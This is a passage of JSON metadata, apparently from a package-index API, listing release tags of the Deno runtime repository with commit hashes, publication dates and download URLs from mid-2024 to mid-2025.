@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4